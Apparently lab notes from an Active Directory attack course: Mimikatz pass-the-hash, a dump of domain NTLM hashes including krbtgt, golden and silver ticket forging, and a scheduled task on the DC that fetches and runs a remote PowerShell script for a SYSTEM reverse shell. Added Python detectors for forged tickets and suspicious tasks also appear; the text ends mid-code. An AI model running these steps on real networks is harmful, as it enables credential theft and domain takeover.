Learning Objective - 8 and 9

Golden ticket

We create a session as the DA from any computer using Mimikatz (pass-the-hash with the Administrator NTLM hash).

PS C:\AD\Tools> .\mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::pth /user:Administrator /domain:dollarcorp.moneycorp.local /ntlm:af0686cc0ca8f04df42210c9ac980760
user    : Administrator
domain  : dollarcorp.moneycorp.local
program : cmd.exe
impers. : no
NTLM    : af0686cc0ca8f04df42210c9ac980760
  |  PID  5128
  |  TID  4660
  |  LSA Process is now R/W
  |  LUID 0 ; 41699318 (00000000:027c47f6)
  \_ msv1_0   - data copy @ 00000216750E60F0 : OK !
  \_ kerberos - data copy @ 00000216753FB7C8
   \_ aes256_hmac       -> null
   \_ aes128_hmac       -> null
   \_ rc4_hmac_nt       OK
   \_ rc4_hmac_old      OK
   \_ rc4_md4           OK
   \_ rc4_hmac_nt_exp   OK
   \_ rc4_hmac_old_exp  OK
   \_ *Password replace @ 0000021675AEF428 (32) -> null

mimikatz #

Then, in the console that was spawned, we import Invoke-Mimikatz and obtain the krbtgt user's hashes.

PS C:\AD\Tools> . .\Invoke-Mimikatz.ps1
PS C:\AD\Tools> Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername dcorp-dc

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 20 2021 19:01:18
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # lsadump::lsa /patch
Domain : dcorp / S-1-5-21-719815819-3726368948-3917688648

RID  : 000001f4 (500)
User : Administrator
LM   :
NTLM : af0686cc0ca8f04df42210c9ac980760

RID  : 000001f5 (501)
User : Guest
LM   :
NTLM :

RID  : 000001f6 (502)
User : krbtgt
LM   :
NTLM : 4e9815869d2090ccfca61c1fe0d23986

RID  : 00000459 (1113)
User : sqladmin
LM   :
NTLM : 07e8be316e3da9a042a9cb681df19bf5

RID  : 0000045a (1114)
User : websvc
LM   :
NTLM : cc098f204c5887eaa8253e7c2749156f

RID  : 0000045b (1115)
User : srvadmin
LM   :
NTLM : a98e18228819e8eec3dfa33cb68b0728

RID  : 0000045d (1117)
User : appadmin
LM   :
NTLM : d549831a955fee51a43c83efb3928fa7

RID  : 0000045e (1118)
User : svcadmin
LM   :
NTLM : b38ff50264b74508085d82c69794a4d8

RID  : 0000045f (1119)
User : testda
LM   :
NTLM : a16452f790729fa34e8f3a08f234a82c

RID  : 00000460 (1120)
User : mgmtadmin
LM   :
NTLM : 95e2cd7ff77379e34c6e46265e75d754

RID  : 00000461 (1121)
User : ciadmin
LM   :
NTLM : e08253add90dccf1a208523d02998c3d

RID  : 00000462 (1122)
User : sql1admin
LM   :
NTLM : e999ae4bd06932620a1e78d2112138c6

RID  : 00001055 (4181)
User : studentadmin
LM   :
NTLM : d1254f303421d3cdbdc4c73a5bce0201

RID  : 00003521 (13601)
User : student721
LM   :
NTLM : c72c376699f31f096b2d5ab64cbdcd94

RID  : 00003522 (13602)
User : student722
LM   :
NTLM : d24ea4c7d485b9db9033c58cf221c900

RID  : 00003523 (13603)
User : student723
LM   :
NTLM : e602f8c5d4a53971a58774eb4db1bdf0

RID  : 00003524 (13604)
User : student724
LM   :
NTLM : 910d4b954db17832138473b090abb337

RID  : 00003525 (13605)
User : student725
LM   :
NTLM : ddaeb719bb3ebaf44f273cf302965f5a

RID  : 00003526 (13606)
User : student726
LM   :
NTLM : 12a836992d9a17bc71aafe08c58a2657

RID  : 00003527 (13607)
User : student727
LM   :
NTLM : d99bd8f6b5a4522f5ca082969f1479c4

RID  : 00003528 (13608)
User : student728
LM   :
NTLM : 9d50c933c86d072edb0815f82e6a5baf

RID  : 00003529 (13609)
User : student729
LM   :
NTLM : e1a081574f45f39d561e9dda3a918a14

RID  : 0000352a (13610)
User : student730
LM   :
NTLM : 9af9ad18e24b91eb4a0116ec8df5a27f

RID  : 0000352b (13611)
User : student731
LM   :
NTLM : 1f1c0cf05907d2bd7e863a7fe55c45b0

RID  : 0000352c (13612)
User : student732
LM   :
NTLM : c2ddcf1a32f71dce214be2cca9c04993

RID  : 0000352d (13613)
User : student733
LM   :
NTLM : e559ae80aaf6bcdc856b5df589f9d695

RID  : 0000352e (13614)
User : student734
LM   :
NTLM : b166b8e2d5dc7127002837197b3d24f4

RID  : 0000352f (13615)
User : student735
LM   :
NTLM : 2c289e4aee543d3ce0b4d65eb5518ad2

RID  : 00003530 (13616)
User : student736
LM   :
NTLM : 99af9ba03d340bdb9ea572cbf0b58406

RID  : 00003531 (13617)
User : student737
LM   :
NTLM : f3f3922ead678ca56a8319ef7adb6bff

RID  : 00003532 (13618)
User : student738
LM   :
NTLM : 9b8e48d74a130fc0d1865405cf2aaba6

RID  : 00003533 (13619)
User : student739
LM   :
NTLM : a39339b2e182046b60232f0478d6a0a4

RID  : 00003534 (13620)
User : student740
LM   :
NTLM : 483e63bc5ecb5d9026f689946eaaf87c

RID  : 00003535 (13621)
User : Control721user
LM   :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID  : 00003536 (13622)
User : Control722user
LM   :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID  : 00003537 (13623)
User : Control723user
LM   :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID  : 00003538 (13624)
User : Control724user
LM   :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID  : 00003539 (13625)
User : Control725user
LM   :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID  : 0000353a (13626)
User : Control726user
LM   :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID  : 0000353b (13627)
User : Control727user
LM   :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID  : 0000353c (13628)
User : Control728user
LM   :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID  : 0000353d (13629)
User : Control729user
LM   :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID  : 0000353e (13630)
User : Control730user
LM   :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID  : 0000353f (13631)
User : Control731user
LM   :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID  : 00003540 (13632)
User : Control732user
LM   :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID  : 00003541 (13633)
User : Control733user
LM   :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID  : 00003542 (13634)
User : Control734user
LM   :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID  : 00003543 (13635)
User : Control735user
LM   :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID  : 00003544 (13636)
User : Control736user
LM   :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID  : 00003545 (13637)
User : Control737user
LM   :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID  : 00003546 (13638)
User : Control738user
LM   :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID  : 00003547 (13639)
User : Control739user
LM   :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID  : 00003548 (13640)
User : Control740user
LM   :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID  : 00003549 (13641)
User : Support721user
LM   :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID  : 0000354a (13642)
User : Support722user
LM   :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID  : 0000354b (13643)
User : Support723user
LM   :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID  : 0000354c (13644)
User : Support724user
LM   :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID  : 0000354d (13645)
User : Support725user
LM   :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID  : 0000354e (13646)
User : Support726user
LM   :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID  : 0000354f (13647)
User : Support727user
LM   :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID  : 00003550 (13648)
User : Support728user
LM   :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID  : 00003551 (13649)
User : Support729user
LM   :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID  : 00003552 (13650)
User : Support730user
LM   :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID  : 00003553 (13651)
User : Support731user
LM   :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID  : 00003554 (13652)
User : Support732user
LM   :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID  : 00003555 (13653)
User : Support733user
LM   :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID  : 00003556 (13654)
User : Support734user
LM   :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID  : 00003557 (13655)
User : Support735user
LM   :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID  : 00003558 (13656)
User : Support736user
LM   :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID  : 00003559 (13657)
User : Support737user
LM   :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID  : 0000355a (13658)
User : Support738user
LM   :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID  : 0000355b (13659)
User : Support739user
LM   :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID  : 0000355c (13660)
User : Support740user
LM   :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID  : 0000355d (13661)
User : VPN721user
LM   :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID  : 0000355e (13662)
User : VPN722user
LM   :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID  : 0000355f (13663)
User : VPN723user
LM   :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID  : 00003560 (13664)
User : VPN724user
LM   :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID  : 00003561 (13665)
User : VPN725user
LM   :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID  : 00003562 (13666)
User : VPN726user
LM   :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID  : 00003563 (13667)
User : VPN727user
LM   :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID  : 00003564 (13668)
User : VPN728user
LM   :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID  : 00003565 (13669)
User : VPN729user
LM   :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID  : 00003566 (13670)
User : VPN730user
LM   :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID  : 00003567 (13671)
User : VPN731user
LM   :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID  : 00003568 (13672)
User : VPN732user
LM   :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID  : 00003569 (13673)
User : VPN733user
LM   :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID  : 0000356a (13674)
User : VPN734user
LM   :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID  : 0000356b (13675)
User : VPN735user
LM   :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID  : 0000356c (13676)
User : VPN736user
LM   :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID  : 0000356d (13677)
User : VPN737user
LM   :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID  : 0000356e (13678)
User : VPN738user
LM   :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID  : 0000356f (13679)
User : VPN739user
LM   :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID  : 00003570 (13680)
User : VPN740user
LM   :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID  : 000003e8 (1000)
User : DCORP-DC$
LM   :
NTLM : ef7a661f7edb7f5a1be191640342d6b7

RID  : 00000451 (1105)
User : DCORP-ADMINSRV$
LM   :
NTLM : b5f451985fd34d58d5120816d31b5565

RID  : 00000452 (1106)
User : DCORP-APPSRV$
LM   :
NTLM : b4cb7bf8b93c78b8051c7906bb054dc5

RID  : 00000453 (1107)
User : DCORP-CI$
LM   :
NTLM : f76f48c176dc09cfd5765843c32809f3

RID  : 00000454 (1108)
User : DCORP-MGMT$
LM   :
NTLM : 0878da540f45b31b974f73312c18e754

RID  : 00000455 (1109)
User : DCORP-MSSQL$
LM   :
NTLM : b205f1ca05bedace801893d6aa5aca27

RID  : 00000456 (1110)
User : DCORP-SQL1$
LM   :
NTLM : 3686dfb420dc0f9635e70c6ca5875b49

RID  : 0000106a (4202)
User : DCORP-STDADMIN$
LM   :
NTLM : e444bbf444732fc38065ea9e9255ab03

RID  : 00003571 (13681)
User : DCORP-STD721$
LM   :
NTLM : b9fed91f5f32818fae2271b05f189926

RID  : 00003572 (13682)
User : DCORP-STD722$
LM   :
NTLM : 2b04543bc07afe3966ff85e06f0a9412

RID  : 00003573 (13683)
User : DCORP-STD724$
LM   :
NTLM : e80b06a0063459999d702dc654312ea5

RID  : 00003574 (13684)
User : DCORP-STD723$
LM   :
NTLM : efd9824a276d26fcc5fc2ca14273225c

RID  : 00003575 (13685)
User : DCORP-STD726$
LM   :
NTLM : 05df9f9bc89dd594c5884e20ce1c683b

RID  : 00003576 (13686)
User : DCORP-STD729$
LM   :
NTLM : 03a26f64fd32b458ca55614c41bc5d80

RID  : 00003577 (13687)
User : DCORP-STD725$
LM   :
NTLM : 0783061c7d97c91b32b6f0c9b2a66c05

RID  : 00003578 (13688)
User : DCORP-STD728$
LM   :
NTLM : 43949d8590e999a5ca4b0eb369c6c620

RID  : 00003579 (13689)
User : DCORP-STD727$
LM   :
NTLM : a19a6642a51ee86db03d722bb2ae7930

RID  : 0000357a (13690)
User : DCORP-STD731$
LM   :
NTLM : e09c18c5b34fb9db4b4bd4e2bdc24c06

RID  : 0000357b (13691)
User : DCORP-STD732$
LM   :
NTLM : fcbf3df06ea9f5a0c0e9d9117bdb9d16

RID  : 0000357c (13692)
User : DCORP-STD730$
LM   :
NTLM : 3befa14afd532cc6faba9f0f9abb3128

RID  : 0000357d (13693)
User : DCORP-STD733$
LM   :
NTLM : e6fb50826836c584764b2e8275bedd9b

RID  : 0000357e (13694)
User : DCORP-STD735$
LM   :
NTLM : 8e5d039b8050c4e6d808ba7b904a107f

RID  : 0000357f (13695)
User : DCORP-STD734$
LM   :
NTLM : a68fa0eb1fa1d3da3a1e43f0e89049a3

RID  : 00003580 (13696)
User : DCORP-STD736$
LM   :
NTLM : 0267e3942c7d30950dba326f224f1882

RID  : 00003581 (13697)
User : DCORP-STD737$
LM   :
NTLM : 845002eccf7afd8343e818d2794d6556

RID  : 00003582 (13698)
User : DCORP-STD739$
LM   :
NTLM : 3070e58dbca650744068b1e120fefddc

RID  : 00003583 (13699)
User : DCORP-STD740$
LM   :
NTLM : b7bb22710be9d4a91bc42e7796ecd458

RID  : 00003584 (13700)
User : DCORP-STD738$
LM   :
NTLM : 6dc73ad2690d87a76bbd4a0ded74808d

RID  : 0000044f (1103)
User : mcorp$
LM   :
NTLM : f5b5c9f1ca76187393db1d3bb8ded94e

RID  : 00000450 (1104)
User : US$
LM   :
NTLM : f85385d81cc4936d37ff8f27813f43c6

RID  : 00000458 (1112)
User : ecorp$
LM   :
NTLM : 4501e4c7f30e1cb3c9886f06a3ed1c6a

Creating the golden ticket:

PS C:\AD\Tools\tickets> Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /rc4:4e9815869d2090ccfca61c1fe0d23986 /startoffset:0 /endin:600 /renewmax:10080 /ticket" "exit"'

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 20 2021 19:01:18
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /rc4:4e9815869d2090ccfca61c1fe0d23986 /startoffset:0 /endin:600 /renewmax:10080 /ticket
User      : Administrator
Domain    : dollarcorp.moneycorp.local (DOLLARCORP)
SID       : S-1-5-21-719815819-3726368948-3917688648
User Id   : 500
Groups Id : *513 512 520 518 519
ServiceKey: 4e9815869d2090ccfca61c1fe0d23986 - rc4_hmac_nt
Lifetime  : 2/24/2024 1:13:24 AM ; 2/24/2024 11:13:24 AM ; 3/2/2024 1:13:24 AM
-> Ticket : ticket.kirbi

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Final Ticket Saved to file !

mimikatz(powershell) # exit
Bye!

PS C:\AD\Tools\tickets> ls


    Directory: C:\AD\Tools\tickets


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         2/24/2024   1:13 AM           1489 ticket.kirbi

Silver Ticket

We run the command to create the silver ticket:

PS C:\AD\Tools\tickets> Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST /rc4:ef7a661f7edb7f5a1be191640342d6b7 /startoffset:0 /endin:600 /renewmax:10080 /ticket" "exit"'

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 20 2021 19:01:18
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST /rc4:ef7a661f7edb7f5a1be191640342d6b7 /startoffset:0 /endin:600 /renewmax:10080 /ticket
User      : Administrator
Domain    : dollarcorp.moneycorp.local (DOLLARCORP)
SID       : S-1-5-21-719815819-3726368948-3917688648
User Id   : 500
Groups Id : *513 512 520 518 519
ServiceKey: ef7a661f7edb7f5a1be191640342d6b7 - rc4_hmac_nt
Service   : HOST
Target    : dcorp-dc.dollarcorp.moneycorp.local
Lifetime  : 2/25/2024 2:22:44 PM ; 2/26/2024 12:22:44 AM ; 3/3/2024 2:22:44 PM
-> Ticket : ticket.kirbi

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Final Ticket Saved to file !

mimikatz(powershell) # exit
Bye!

PS C:\AD\Tools\tickets> ls


    Directory: C:\AD\Tools\tickets


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         2/24/2024   1:13 AM           1489 golden-ticket.kirbi
-a----         2/25/2024   2:22 PM           1503 ticket.kirbi

Importing the ticket with Mimikatz

PS C:\AD\Tools\tickets> klist

Current LogonId is 0:0x17ce62

Cached Tickets: (0)
PS C:\AD\Tools\tickets> Invoke-Mimikatz -Command '"kerberos::ptt silver-ticket.kirbi" "exit"'

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 20 2021 19:01:18
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # kerberos::ptt silver-ticket.kirbi

* File: 'silver-ticket.kirbi': OK

mimikatz(powershell) # exit
Bye!

PS C:\AD\Tools\tickets> klist

Current LogonId is 0:0x17ce62

Cached Tickets: (1)

#0>     Client: Administrator @ dollarcorp.moneycorp.local
        Server: HOST/dcorp-dc.dollarcorp.moneycorp.local @ dollarcorp.moneycorp.local
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
        Start Time: 2/25/2024 14:22:44 (local)
        End Time:   2/26/2024 0:22:44 (local)
        Renew Time: 3/3/2024 14:22:44 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0
        Kdc Called:
PS C:\AD\Tools\tickets>
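From the defender's side, the klist output above is the artefact worth learning to read: the forged ticket has an empty "Kdc Called:" field because it was injected with kerberos::ptt rather than issued by a DC, it is RC4-HMAC because it was built from an NT hash, and the cache holds a HOST/dcorp-dc service ticket with no krbtgt TGT next to it. The Python below is an added example, not part of these lab notes or of Mimikatz: it parses a klist dump and flags those three indicators, plus any lifetime longer than the domain policy allows. The injected sample is the dump shown above; the contrasting "normal" dump, the 10-hour / 7-day policy maximums and the en-US klist time format are assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed sample: the klist output shown in the lab above, right after
# kerberos::ptt injected the forged HOST/dcorp-dc service ticket.
INJECTED_KLIST = """\
Current LogonId is 0:0x17ce62

Cached Tickets: (1)

#0>     Client: Administrator @ dollarcorp.moneycorp.local
        Server: HOST/dcorp-dc.dollarcorp.moneycorp.local @ dollarcorp.moneycorp.local
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
        Start Time: 2/25/2024 14:22:44 (local)
        End Time:   2/26/2024 0:22:44 (local)
        Renew Time: 3/3/2024 14:22:44 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0
        Kdc Called:
"""

# Constructed contrast sample (assumption, not captured in the lab): a TGT obtained
# normally from the DC, with an AES key, a KDC name recorded and policy-length lifetimes.
NORMAL_KLIST = """\
Current LogonId is 0:0x3e7ab1

Cached Tickets: (1)

#0>     Client: student721 @ dollarcorp.moneycorp.local
        Server: krbtgt/dollarcorp.moneycorp.local @ dollarcorp.moneycorp.local
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Start Time: 2/25/2024 14:00:00 (local)
        End Time:   2/26/2024 0:00:00 (local)
        Renew Time: 3/3/2024 14:00:00 (local)
        Kdc Called: dcorp-dc.dollarcorp.moneycorp.local
"""

TICKET_START = re.compile(r"^#(\d+)>\s*(.*)$")


def parse_klist(text):
    """Turn klist output into one {'Field': 'value'} dict per cached ticket."""
    tickets, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        m = TICKET_START.match(line)
        if m:                                   # '#n>' opens a ticket; its first field is on that line
            current = {"index": int(m.group(1))}
            tickets.append(current)
            line = m.group(2)
        if current is None or ":" not in line:  # header lines and 'Ticket Flags ...' carry no colon
            continue
        key, _, value = line.partition(":")
        current[key.strip()] = value.strip()
    return tickets


def _parse_local_time(value):
    """klist prints M/D/YYYY H:MM:SS (local) on an en-US system (assumed here)."""
    return datetime.strptime(value.replace("(local)", "").strip(), "%m/%d/%Y %H:%M:%S")


def analyze_klist(text, max_ticket_hours=10, max_renew_days=7):
    """Return 'ticket#n <code>: detail' findings. Codes:
    no-kdc-called   ticket sits in the cache but no KDC issued it (pass-the-ticket injection)
    rc4-ticket      RC4-HMAC ticket; tickets forged from an NT hash are RC4, AES domains issue AES
    lifetime-policy ticket or renew lifetime longer than the domain policy maximum
    no-tgt-in-cache service ticket(s) without any krbtgt/ TGT, as after injecting a silver ticket
    The policy defaults (10 h / 7 days) are an assumption about this domain."""
    tickets, findings = parse_klist(text), []
    for t in tickets:
        tag = f"ticket#{t['index']}"
        if not t.get("Kdc Called"):
            findings.append(f"{tag} no-kdc-called: {t.get('Server', '?')}")
        if "RC4" in t.get("KerbTicket Encryption Type", "").upper():
            findings.append(f"{tag} rc4-ticket: {t['KerbTicket Encryption Type']}")
        try:
            start, end, renew = (_parse_local_time(t[k]) for k in ("Start Time", "End Time", "Renew Time"))
        except (KeyError, ValueError):
            continue                            # times missing or in another locale: skip lifetime checks
        if end - start > timedelta(hours=max_ticket_hours):
            findings.append(f"{tag} lifetime-policy: ticket life {end - start} > {max_ticket_hours}h")
        if renew - start > timedelta(days=max_renew_days):
            findings.append(f"{tag} lifetime-policy: renew life {renew - start} > {max_renew_days}d")
    if tickets and not any(t.get("Server", "").startswith("krbtgt/") for t in tickets):
        findings.append("cache no-tgt-in-cache: service ticket(s) cached without a TGT")
    return findings


if __name__ == "__main__":
    for name, dump in (("injected", INJECTED_KLIST), ("normal", NORMAL_KLIST)):
        print(name, analyze_klist(dump) or ["clean"])
```

Note that the lifetime check stays silent on the lab's ticket: /endin:600 and /renewmax:10080 are exactly the default 10-hour and 7-day maximums, so a ticket forged with default-looking lifetimes is caught by the other three signals, not by this one. Tickets forged with the older 10-year default lifetime are what this check is for.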

Getting a reverse TCP shell by creating a scheduled task with the silver ticket

PS C:\AD\Tools\tickets> schtasks /create /S dcorp-dc.dollarcorp.moneycorp.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "Tareita" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.23/Invoke-PowerShellTcp.ps1''')'"
SUCCESS: The scheduled task "Tareita" has successfully been created.

PS C:\AD\Tools\tickets> schtasks /Run /S dcorp-dc.dollarcorp.moneycorp.local /TN "Tareita"
SUCCESS: Attempted to run the scheduled task "Tareita".

C:\AD\Tools\netcat-win32-1.12>nc -lvp 6969
listening on [any] 6969 ...
172.16.2.1: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [172.16.100.23] from (UNKNOWN) [172.16.2.1] 61506: NO_DATA
Windows PowerShell running as user DCORP-DC$ on DCORP-DC
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32>whoami
nt authority\system
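Whatever is run through the injected ticket, the scheduled task itself leaves a record on the DC: Security event 4698 ("A scheduled task was created") carries the creating account, the task name and the full task XML, including the principal it runs as and the command line. The silver ticket never touched the KDC, so the DC has no 4769 for the HOST/dcorp-dc service ticket; the 4698, together with the 4624 network logon that precedes it, is what remains to alert on. The Python below is an added example, not part of the lab notes: it parses a 4698 event and flags tasks that run as SYSTEM and whose action is a PowerShell download cradle. The event XML is constructed (no real event was captured in the lab); its TaskContent mirrors the Tareita task created above.

```python
import re
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

EVENT_NS = {"ev": "http://schemas.microsoft.com/win/2004/08/events/event"}
TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Constructed task definition matching the "Tareita" task from the lab above
# (weekly trigger, runs as SYSTEM, action is the schtasks /TR string).
SAMPLE_TASK_XML = """<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><ScheduleByWeek><WeeksInterval>1</WeeksInterval></ScheduleByWeek></CalendarTrigger></Triggers>
  <Principals><Principal id="Author"><UserId>S-1-5-18</UserId><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Actions Context="Author">
    <Exec>
      <Command>powershell.exe</Command>
      <Arguments>-c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.23/Invoke-PowerShellTcp.ps1''')'</Arguments>
    </Exec>
  </Actions>
</Task>"""

# Constructed Security event 4698 as the DC would log it (assumption: no real event
# was captured for the lab). TaskContent carries the task XML escaped inside the event.
SAMPLE_EVENT_4698 = """<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing"/>
    <EventID>4698</EventID>
    <Computer>dcorp-dc.dollarcorp.moneycorp.local</Computer>
  </System>
  <EventData>
    <Data Name="SubjectUserName">Administrator</Data>
    <Data Name="SubjectDomainName">DOLLARCORP</Data>
    <Data Name="TaskName">\\Tareita</Data>
    <Data Name="TaskContent">__TASK__</Data>
  </EventData>
</Event>""".replace("__TASK__", escape(SAMPLE_TASK_XML))

SYSTEM_PRINCIPALS = {"S-1-5-18", "NT AUTHORITY\\SYSTEM", "SYSTEM"}
CRADLE_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest", "iex ",
                  "invoke-expression", "frombase64string", "-encodedcommand", "-enc ")


def _text(el, path):
    return el.findtext(path, default="", namespaces=TASK_NS) if el is not None else ""


def parse_event_4698(event_xml):
    """Pull creator, task name, run-as principal and Exec action out of a 4698 event."""
    root = ET.fromstring(event_xml)
    event_data = root.find("ev:EventData", EVENT_NS)
    if event_data is None:
        raise ValueError("not a Security-Auditing event with EventData")
    data = {d.get("Name"): (d.text or "") for d in event_data}
    # TaskContent has its own <?xml ... encoding="UTF-16"?> header; drop it before re-parsing as str
    task = ET.fromstring(re.sub(r"^\s*<\?xml[^>]*\?>", "", data["TaskContent"]))
    principal = task.find("t:Principals/t:Principal", TASK_NS)
    action = task.find("t:Actions/t:Exec", TASK_NS)
    return {
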